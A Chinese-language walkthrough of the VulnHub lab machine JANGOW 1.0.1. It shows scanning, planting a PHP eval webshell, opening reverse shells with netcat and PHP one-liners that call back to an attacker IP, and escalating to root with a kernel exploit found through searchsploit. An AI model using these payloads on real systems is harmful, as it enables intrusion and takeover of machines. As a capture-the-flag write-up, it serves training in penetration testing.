VulnHub靶场之JANGOW: 1.0.1
首先是下载镜像,然后用vmware打开,记得关闭usb,然后网络配置建议设置成桥接模式,然后需要指定桥接的网卡。
这样对于这个镜像还不够,需要改网卡配置。详情看另外一个视频
使用nmap进行扫描
sudo nmap -sP 192.168.[num1].1/24
/24表示那个网段1-254都扫描
然后对靶机的ip进行端口扫描
sudo nmap -sC -sV -p- 192.168.[num1].[num2]
-sC 表示使用nmap脚本探测 -sV探测服务信息
-p-表示扫描全端口
扫出来开放了21和80端口
访问80端口可以看到一个网页
可以看到有一个任意命令执行漏洞
echo '<?php eval($_POST["hacker"]);' > hacker.php
蚁剑连接一下
检查文件目录
/var/www/html/site/wordpress
除此之外发现在/var/www/html下有一个./backup文件
然后21端口,用浏览器访问一遍,然后再连接一遍
发现能访问的目录是一样的,也就没啥用
现在就要反弹shell
这个靶机是对端口有限制的,只能用443端口。怎么判断出来的呢,两个办法。一个是因为他有网站相关服务,80端口443端口对应http和https,所以一般不会做限制。第二个办法就是利用脚本,每个端口都试一遍。而攻击机只需要把所有端口的流量都转到一个端口
sudo iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 1234
nc -lvvp 1234
通过测试,发现只有443端口能用,则执行
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.[num] 443 >/tmp/f');?>
kali
nc -lvvp 443
Mac 得使用下面这个
nc -l 443
用这个升级一下bash功能
python3 -c 'import pty;pty.spawn("/bin/bash")'
看一下系统版本
uname -a
cat /proc/version
searchsploit linux kernel 4.4
searchsploit ubuntu16.04
找到这个45010.c文件,传到靶机,然后
gcc 45010.c
chmod +x a.out
./a.out
whomi
cat /root/proof.txt
443
ss
netstat -aptn
php -r '$sock=fsockopen("192.168.2.199",3306);exec("/bin/bash -i <&3 >&3 2>&3");'